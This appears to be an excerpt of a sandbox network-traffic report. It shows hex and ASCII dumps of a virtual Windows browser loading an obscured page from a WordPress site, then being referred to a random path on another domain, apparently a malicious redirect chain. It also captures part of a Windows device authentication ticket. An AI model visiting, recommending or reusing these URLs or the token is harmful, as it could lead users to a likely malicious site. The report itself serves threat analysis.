                                                                                                                                                                                                                            2025-02-11 15:26:56 UTC269INHTTP/1.1 200 OK
                                                                                                                                                                                                                            keep-alive: timeout=5, max=100
                                                                                                                                                                                                                            x-powered-by: PHP/7.4.33
                                                                                                                                                                                                                            content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                            transfer-encoding: chunked
                                                                                                                                                                                                                            date: Tue, 11 Feb 2025 15:26:55 GMT
                                                                                                                                                                                                                            server: LiteSpeed
                                                                                                                                                                                                                            vary: User-Agent
                                                                                                                                                                                                                            x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                                            2025-02-11 15:26:56 UTC16115INData Raw: 31 30 30 30 30 0d 0a 0d 0a 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 2a 2a 2a 2a 2d 2d 2d 2a 2a 2a 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 53 65 67 6f 65 20 55 49 22 2c 20
                                                                                                                                                                                                                            Data Ascii: 10000<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>****---***</title> <style> body { font-family: "Segoe UI",
                                                                                                                                                                                                                            2025-02-11 15:26:56 UTC16384INData Raw: 33 45 61 5a 69 48 41 56 6c 4d 71 68 36 77 34 33 6e 35 71 41 52 6a 69 66 6d 49 63 65 7a 58 4a 74 42 4b 61 31 34 4f 4c 37 6c 57 6f 42 6a 65 48 34 2f 4f 4f 42 4f 79 63 49 45 5a 4d 56 37 46 37 4e 55 73 48 6a 76 62 66 4d 68 63 5a 78 78 4f 6e 49 69 55 5a 78 77 47 6d 51 38 68 53 4b 46 37 34 45 51 74 36 4d 6f 41 5a 4a 53 67 70 4a 39 74 50 4c 39 6d 6e 41 39 62 69 31 6d 4e 6e 56 63 61 75 49 51 58 68 7a 39 4b 48 62 4a 57 53 46 7a 56 55 6f 4c 4e 4f 30 70 4a 72 54 66 69 4f 73 51 4f 78 72 56 35 37 38 41 74 75 74 6a 33 4d 6c 2f 71 35 6f 5a 72 41 7a 6e 71 6d 66 67 63 55 34 6a 74 38 42 6b 63 70 63 33 50 6d 58 64 2b 74 5a 38 32 37 50 5a 57 6a 50 4f 68 67 78 52 34 59 4b 66 70 46 68 65 2f 38 54 6a 43 33 36 79 44 33 73 73 77 62 59 66 52 59 69 48 32 38 69 43 78 58 77 43 4c 2f
                                                                                                                                                                                                                            Data Ascii: 3EaZiHAVlMqh6w43n5qARjifmIcezXJtBKa14OL7lWoBjeH4/OOBOycIEZMV7F7NUsHjvbfMhcZxxOnIiUZxwGmQ8hSKF74EQt6MoAZJSgpJ9tPL9mnA9bi1mNnVcauIQXhz9KHbJWSFzVUoLNO0pJrTfiOsQOxrV578Atutj3Ml/q5oZrAznqmfgcU4jt8Bkcpc3PmXd+tZ827PZWjPOhgxR4YKfpFhe/8TjC36yD3sswbYfRYiH28iCxXwCL/
                                                                                                                                                                                                                            2025-02-11 15:26:56 UTC16384INData Raw: 34 6e 56 78 72 4f 49 58 75 4f 68 75 59 7a 6d 62 66 38 31 73 39 56 39 76 57 4f 77 4a 77 77 4c 38 54 68 65 44 39 79 61 36 36 4d 64 34 48 4c 4d 4d 6f 75 50 50 79 39 61 76 66 31 4b 73 37 49 42 57 49 6e 54 30 49 6e 7a 42 74 63 64 72 6b 32 59 35 41 68 68 78 48 34 72 69 7a 38 42 63 75 38 6f 35 38 37 70 4b 6e 6a 6d 70 72 48 79 35 30 73 38 4a 39 67 32 71 35 32 6a 4d 47 69 58 68 33 57 38 54 49 6c 36 4c 34 6a 49 4a 42 2f 59 30 43 41 78 63 62 75 46 44 68 54 30 2b 73 42 51 6f 74 56 48 43 52 41 6b 55 51 33 43 79 43 41 67 55 32 31 69 46 76 4e 78 46 61 75 74 55 67 41 69 4a 65 6d 4c 44 6a 4b 2b 75 56 53 4a 33 48 44 33 42 69 4f 56 37 6c 32 4a 59 35 4f 4a 71 62 65 48 58 4a 67 51 61 31 46 72 75 2b 48 77 69 77 69 61 4d 57 49 53 32 57 73 63 43 4e 70 45 6a 79 4b 7a 76 6b 2b 69
                                                                                                                                                                                                                            Data Ascii: 4nVxrOIXuOhuYzmbf81s9V9vWOwJwwL8TheD9ya66Md4HLMMouPPy9avf1Ks7IBWInT0InzBtcdrk2Y5AhhxH4riz8Bcu8o587pKnjmprHy50s8J9g2q52jMGiXh3W8TIl6L4jIJB/Y0CAxcbuFDhT0+sBQotVHCRAkUQ3CyCAgU21iFvNxFautUgAiJemLDjK+uVSJ3HD3BiOV7l2JY5OJqbeHXJgQa1Fru+HwiwiaMWIS2WscCNpEjyKzvk+i
                                                                                                                                                                                                                            2025-02-11 15:26:56 UTC15259INData Raw: 55 39 2b 36 4c 41 63 78 41 75 48 73 71 55 5a 35 77 58 4e 79 39 5a 6a 50 41 7a 59 7a 4a 51 4b 6b 49 46 38 72 48 4a 76 68 76 2f 2f 54 58 32 72 6a 34 36 31 2b 6a 57 44 51 32 4e 64 7a 79 6e 7a 59 72 59 44 52 47 4b 67 79 73 38 4f 69 4b 52 78 65 4b 6d 78 50 58 47 78 57 2f 76 4c 6f 57 30 72 42 77 63 4f 68 54 6a 6d 6d 67 71 58 51 50 68 6d 77 35 53 7a 37 70 76 65 51 74 45 32 38 34 6f 57 44 35 71 4a 44 4e 44 72 4e 35 4c 79 6f 6c 53 77 4e 46 35 53 42 50 7a 67 73 6d 4e 76 4f 67 39 36 50 54 4b 39 73 45 78 2b 37 38 46 6f 55 37 2f 6c 4a 4d 4e 44 47 56 54 63 4d 70 53 4c 70 6c 77 71 46 71 73 65 2b 4d 36 2f 6f 6b 38 75 67 67 69 46 2f 64 31 39 54 43 44 64 6b 70 32 32 36 78 58 2f 41 33 34 6f 45 78 67 76 73 57 33 73 66 55 6a 68 32 61 36 79 6c 35 36 54 4b 49 74 34 58 45 35 72
                                                                                                                                                                                                                            Data Ascii: U9+6LAcxAuHsqUZ5wXNy9ZjPAzYzJQKkIF8rHJvhv//TX2rj461+jWDQ2NdzynzYrYDRGKgys8OiKRxeKmxPXGxW/vLoW0rBwcOhTjmmgqXQPhmw5Sz7pveQtE284oWD5qJDNDrN5LyolSwNF5SBPzgsmNvOg96PTK9sEx+78FoU7/lJMNDGVTcMpSLplwqFqse+M6/ok8uggiF/d19TCDdkp226xX/A34oExgvsW3sfUjh2a6yl56TKIt4XE5r
                                                                                                                                                                                                                            2025-02-11 15:26:56 UTC1401INData Raw: 55 46 33 30 50 69 68 74 64 61 32 75 43 63 4d 2b 53 35 65 61 6a 4f 77 57 6c 4c 61 48 34 4a 75 45 59 54 4b 41 53 63 56 50 4d 51 56 55 76 57 61 73 30 32 74 34 32 4b 55 67 64 66 31 78 34 51 65 39 31 30 6e 55 2f 47 5a 66 36 78 48 72 6a 66 6a 7a 78 77 67 55 48 55 4e 58 65 37 6b 75 69 6a 79 74 33 6f 48 76 45 65 31 2f 55 38 66 32 4b 70 33 70 38 61 46 55 41 64 76 7a 6c 68 53 4f 56 4e 6f 52 32 58 35 6b 55 55 37 4d 75 54 6f 71 62 53 58 73 74 6c 50 62 47 44 78 50 48 36 42 41 72 50 7a 59 6f 69 47 74 7a 52 52 63 32 4e 42 41 4d 49 76 77 6c 53 47 78 66 36 39 6b 51 32 4b 4b 36 2f 55 58 47 78 73 54 34 64 70 4c 4b 57 44 62 61 53 74 62 43 35 43 4d 56 72 4d 64 35 77 6b 41 59 46 47 68 62 36 64 6f 55 32 4b 76 44 57 68 44 55 78 30 4c 53 34 6c 42 72 66 35 54 34 43 47 79 4d 6e 44
                                                                                                                                                                                                                            Data Ascii: UF30Pihtda2uCcM+S5eajOwWlLaH4JuEYTKAScVPMQVUvWas02t42KUgdf1x4Qe910nU/GZf6xHrjfjzxwgUHUNXe7kuijyt3oHvEe1/U8f2Kp3p8aFUAdvzlhSOVNoR2X5kUU7MuToqbSXstlPbGDxPH6BArPzYoiGtzRRc2NBAMIvwlSGxf69kQ2KK6/UXGxsT4dpLKWDbaStbC5CMVrMd5wkAYFGhb6doU2KvDWhDUx0LS4lBrf5T4CGyMnD
                                                                                                                                                                                                                            2025-02-11 15:26:56 UTC16384INData Raw: 0d 0a 31 30 30 30 30 0d 0a 53 54 74 6c 32 6e 78 79 44 38 4e 75 6d 54 5a 58 39 49 4a 4a 48 47 36 4f 78 4f 46 76 53 37 55 65 4e 6d 6b 31 67 56 6f 63 72 56 48 59 62 44 61 44 49 47 31 49 4b 6e 79 64 6f 6b 47 77 7a 66 4a 65 47 36 63 33 62 59 43 68 4c 6b 33 4a 37 53 70 70 30 68 72 34 47 6a 45 39 76 53 35 7a 47 7a 42 53 65 38 4f 64 57 50 4f 51 64 47 6f 50 49 31 70 63 62 32 55 55 59 55 6b 75 49 37 73 48 63 73 78 6d 47 33 7a 71 74 68 49 78 71 7a 71 7a 36 44 61 70 30 72 6c 2b 36 56 62 73 37 45 46 58 6b 4e 64 4a 56 38 30 32 33 39 38 77 2f 2b 55 6d 72 62 69 63 71 63 66 2b 32 4e 59 32 66 49 4f 4d 37 48 58 7a 50 66 79 58 77 44 79 6d 42 35 33 37 30 74 78 45 50 62 42 31 30 66 57 33 2f 74 35 48 37 7a 37 72 4c 72 34 32 6e 43 51 2f 7a 50 58 75 38 32 2b 58 56 50 55 2b 78 6b
                                                                                                                                                                                                                            Data Ascii: 10000STtl2nxyD8NumTZX9IJJHG6OxOFvS7UeNmk1gVocrVHYbDaDIG1IKnydokGwzfJeG6c3bYChLk3J7Spp0hr4GjE9vS5zGzBSe8OdWPOQdGoPI1pcb2UUYUkuI7sHcsxmG3zqthIxqzqz6Dap0rl+6Vbs7EFXkNdJV802398w/+Umrbicqcf+2NY2fIOM7HXzPfyXwDymB5370txEPbB10fW3/t5H7z7rLr42nCQ/zPXu82+XVPU+xk
                                                                                                                                                                                                                            2025-02-11 15:26:56 UTC16384INData Raw: 6b 58 53 35 74 6e 49 52 4a 4c 6f 6f 62 41 45 70 39 65 6b 46 72 30 38 33 45 47 59 79 53 53 43 4f 53 4b 4a 2b 61 77 4b 47 6a 69 43 35 53 64 7a 70 55 35 6f 70 75 4b 33 6a 76 62 48 78 56 67 69 79 52 6b 4b 56 6c 5a 4a 2f 4c 37 71 65 6d 31 36 43 72 59 4f 33 32 58 74 53 6a 41 4d 7a 47 36 55 61 41 69 68 65 69 4e 61 4b 77 2b 49 45 68 6e 66 30 76 48 48 42 38 6b 56 68 6a 75 36 37 38 56 74 31 37 6a 4c 4d 5a 31 54 4c 37 4f 49 2b 44 43 66 39 76 53 4e 6c 6e 79 62 5a 49 75 39 76 74 42 42 75 7a 51 69 5a 72 4d 58 4d 75 65 4a 6f 79 71 38 6b 68 41 56 65 6d 64 57 52 70 68 55 62 44 65 6d 49 62 75 4d 39 4d 4f 53 51 32 35 4b 68 45 6d 38 6a 53 42 4a 67 7a 6f 2b 34 37 49 54 70 39 5a 69 57 45 79 72 38 70 44 38 32 65 44 69 74 55 57 41 6c 70 4f 54 37 67 50 6b 69 33 48 75 64 31 78 35
                                                                                                                                                                                                                            Data Ascii: kXS5tnIRJLoobAEp9ekFr083EGYySSCOSKJ+awKGjiC5SdzpU5opuK3jvbHxVgiyRkKVlZJ/L7qem16CrYO32XtSjAMzG6UaAiheiNaKw+IEhnf0vHHB8kVhju678Vt17jLMZ1TL7OI+DCf9vSNlnybZIu9vtBBuzQiZrMXMueJoyq8khAVemdWRphUbDemIbuM9MOSQ25KhEm8jSBJgzo+47ITp9ZiWEyr8pD82eDitUWAlpOT7gPki3Hud1x5
                                                                                                                                                                                                                            2025-02-11 15:26:56 UTC16384INData Raw: 75 50 41 6b 2b 4a 67 34 4a 4b 36 61 6d 75 4b 57 36 4b 58 39 51 58 34 61 4f 74 6d 79 4d 33 54 71 4f 70 6c 72 70 57 77 66 4c 6b 4c 76 67 35 2f 65 79 79 4b 64 45 55 79 35 6f 48 66 74 6d 73 64 59 78 68 43 34 58 4d 39 70 43 2b 67 6c 31 7a 66 57 61 77 61 4e 54 42 39 36 77 52 57 66 36 6f 6d 2f 56 64 4f 78 56 69 4c 4c 38 38 66 41 73 69 4e 49 46 45 6f 34 31 66 57 79 35 5a 2f 74 56 63 4d 2f 78 74 56 6c 52 4b 79 70 62 6f 47 4f 73 6c 56 6b 50 59 35 7a 70 30 55 62 69 33 4a 68 5a 7a 50 7a 69 46 2b 73 55 44 4b 4d 54 55 5a 62 6e 48 4a 52 50 4a 54 67 5a 6e 43 78 33 4f 50 6f 62 78 6d 73 51 48 76 6b 78 7a 44 30 6a 4c 59 4a 46 2b 6b 58 78 42 43 41 39 68 7a 43 72 69 32 6a 65 62 6a 6e 70 50 2b 33 4f 4e 37 79 73 50 69 6d 31 65 78 38 42 65 4b 59 54 6d 4e 32 2b 36 64 78 34 41 42
                                                                                                                                                                                                                            Data Ascii: uPAk+Jg4JK6amuKW6KX9QX4aOtmyM3TqOplrpWwfLkLvg5/eyyKdEUy5oHftmsdYxhC4XM9pC+gl1zfWawaNTB96wRWf6om/VdOxViLL88fAsiNIFEo41fWy5Z/tVcM/xtVlRKypboGOslVkPY5zp0Ubi3JhZzPziF+sUDKMTUZbnHJRPJTgZnCx3OPobxmsQHvkxzD0jLYJF+kXxBCA9hzCri2jebjnpP+3ON7ysPim1ex8BeKYTmN2+6dx4AB
                                                                                                                                                                                                                            2025-02-11 15:26:56 UTC16322INData Raw: 45 57 51 4e 74 7a 53 57 37 36 69 6a 34 2b 33 72 75 72 6a 2f 62 53 42 44 33 48 63 76 58 31 2f 66 2b 67 76 33 72 6a 72 6d 39 2f 38 55 77 36 36 59 4d 7a 32 58 72 65 75 43 4b 53 58 71 42 5a 68 66 6a 47 74 6f 59 51 2f 70 6d 75 62 71 36 79 49 6e 35 67 4c 6b 6d 43 72 45 69 2b 36 66 49 43 62 54 79 4c 5a 41 37 4b 5a 44 7a 52 42 31 75 70 68 7a 39 72 45 6f 4b 6c 6d 36 31 56 2f 67 78 75 42 78 35 41 65 6e 68 75 36 6d 46 54 71 61 57 6b 4e 36 65 71 43 56 6c 34 4b 74 37 4a 74 56 6d 67 5a 46 4b 31 66 6c 62 52 4d 6e 45 52 73 37 55 39 68 68 42 44 5a 52 34 37 4e 57 46 36 42 75 61 7a 54 4a 72 30 59 53 39 57 67 58 6a 71 70 4e 36 37 59 55 69 49 62 6c 57 52 58 66 79 6f 78 41 4e 4a 74 50 4d 64 66 4e 2f 78 33 52 79 31 7a 32 64 34 70 2f 4c 58 5a 6c 48 62 2f 4f 4b 75 58 74 4b 6b 44
                                                                                                                                                                                                                            Data Ascii: EWQNtzSW76ij4+3rurj/bSBD3HcvX1/f+gv3rjrm9/8Uw66YMz2XreuCKSXqBZhfjGtoYQ/pmubq6yIn5gLkmCrEi+6fICbTyLZA7KZDzRB1uphz9rEoKlm61V/gxuBx5Aenhu6mFTqaWkN6eqCVl4Kt7JtVmgZFK1flbRMnERs7U9hhBDZR47NWF6BuazTJr0YS9WgXjqpN67YUiIblWRXfyoxANJtPMdfN/x3Ry1z2d4p/LXZlHb/OKuXtKkD
                                                                                                                                                                                                                            2025-02-11 15:26:56 UTC71INData Raw: 50 57 64 55 4d 76 4b 53 61 55 50 7a 65 54 70 2b 35 76 64 31 50 68 76 76 78 33 55 5a 74 7a 30 54 74 2f 30 2f 43 35 51 30 4a 70 59 66 69 6b 4a 56 62 39 79 30 55 42 35 4d 37 4d 4b 6e 74 7a 6f 4c 50 70 45 55 38 70 5a
                                                                                                                                                                                                                            Data Ascii: PWdUMvKSaUPzeTp+5vd1Phvvx3UZtz0Tt/0/C5Q0JpYfikJVb9y0UB5M7MKntzoLPpEU8pZ


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            3192.168.2.64973266.29.153.2224436820C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-02-11 15:26:56 UTC614OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                                            Host: handymanproservices.com
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: image
                                                                                                                                                                                                                            Referer: https://handymanproservices.com/wp-includes/
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2025-02-11 15:26:56 UTC319INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                            keep-alive: timeout=5, max=100
                                                                                                                                                                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                            pragma: no-cache
                                                                                                                                                                                                                            content-type: text/html
                                                                                                                                                                                                                            content-length: 1251
                                                                                                                                                                                                                            date: Tue, 11 Feb 2025 15:26:56 GMT
                                                                                                                                                                                                                            server: LiteSpeed
                                                                                                                                                                                                                            vary: User-Agent
                                                                                                                                                                                                                            x-turbo-charged-by: LiteSpeed
                                                                                                                                                                                                                            connection: close
                                                                                                                                                                                                                            2025-02-11 15:26:56 UTC1251INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                                                                                                                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            4192.168.2.64973640.113.110.67443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-02-11 15:26:58 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 51 49 39 71 79 6b 75 75 76 30 79 42 4b 51 69 36 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 30 65 61 65 66 30 39 33 34 63 61 62 39 63 30 0d 0a 0d 0a
                                                                                                                                                                                                                            Data Ascii: CNT 1 CON 305MS-CV: QI9qykuuv0yBKQi6.1Context: e0eaef0934cab9c0
                                                                                                                                                                                                                            2025-02-11 15:26:58 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                            Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                            2025-02-11 15:26:58 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 51 49 39 71 79 6b 75 75 76 30 79 42 4b 51 69 36 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 30 65 61 65 66 30 39 33 34 63 61 62 39 63 30 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 54 34 57 66 47 6c 32 58 49 35 78 72 43 43 49 72 79 6f 38 59 4d 57 42 67 62 69 6b 7a 4b 30 72 32 36 48 5a 55 42 39 71 70 64 33 5a 58 76 7a 56 7a 48 33 2b 76 52 30 73 33 41 39 6e 54 52 70 50 73 5a 61 66 63 77 77 63 68 78 72 76 4b 76 67 39 58 2b 34 43 63 4a 66 6a 56 41 66 4f 42 55 6d 6d 50 74 44 48 69 72 34 30 51 6e 67 55 50 6c
                                                                                                                                                                                                                            Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: QI9qykuuv0yBKQi6.2Context: e0eaef0934cab9c0<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAT4WfGl2XI5xrCCIryo8YMWBgbikzK0r26HZUB9qpd3ZXvzVzH3+vR0s3A9nTRpPsZafcwwchxrvKvg9X+4CcJfjVAfOBUmmPtDHir40QngUPl
                                                                                                                                                                                                                            2025-02-11 15:26:58 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 51 49 39 71 79 6b 75 75 76 30 79 42 4b 51 69 36 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 65 30 65 61 65 66 30 39 33 34 63 61 62 39 63 30 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                                                                                                                                                                                            Data Ascii: BND 3 CON\WNS 0 197MS-CV: QI9qykuuv0yBKQi6.3Context: e0eaef0934cab9c0<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                                                                                                                                                                                            2025-02-11 15:26:59 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                            Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                            2025-02-11 15:26:59 UTC58INData Raw: 4d 53 2d 43 56 3a 20 6d 7a 76 67 2f 30 77 6f 72 45 69 45 63 68 7a 54 6d 48 54 2f 46 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                            Data Ascii: MS-CV: mzvg/0worEiEchzTmHT/Fw.0Payload parsing failed.


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            5192.168.2.649739188.114.96.34436820C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2025-02-11 15:27:10 UTC720OUTGET /bQpOadeMo/ HTTP/1.1
                                                                                                                                                                                                                            Host: 8l.dichotomou8.com
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                            Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                            Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                            Sec-Fetch-User: ?1
                                                                                                                                                                                                                            Sec-Fetch-Dest: document
                                                                                                                                                                                                                            Referer: https://handymanproservices.com/
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2025-02-11 15:27:11 UTC1244INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Tue, 11 Feb 2025 15:27:11 GMT
                                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: no-cache, private
                                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=duT7OP1yHyNzhbeQ88kiDO%2BBJwvF51YcGbob3Sw41GQK7%2FG2fdXmpwxq7EqJxXLd%2B18Gk8ilmBL6WLuDyk0AwCXP69dgSVIIzgonMY3LaqU1LeF%2BjlKKFsplW5nBTQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1223&min_rtt=1218&rtt_var=467&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2823&recv_bytes=1626&delivery_rate=2294770&cwnd=251&unsent_bytes=0&cid=2ba784fd72c49173&ts=181&x=0"
